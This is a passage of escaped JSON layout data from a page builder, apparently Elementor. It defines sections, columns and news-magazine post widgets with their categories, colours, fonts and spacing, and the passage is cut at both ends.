y\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\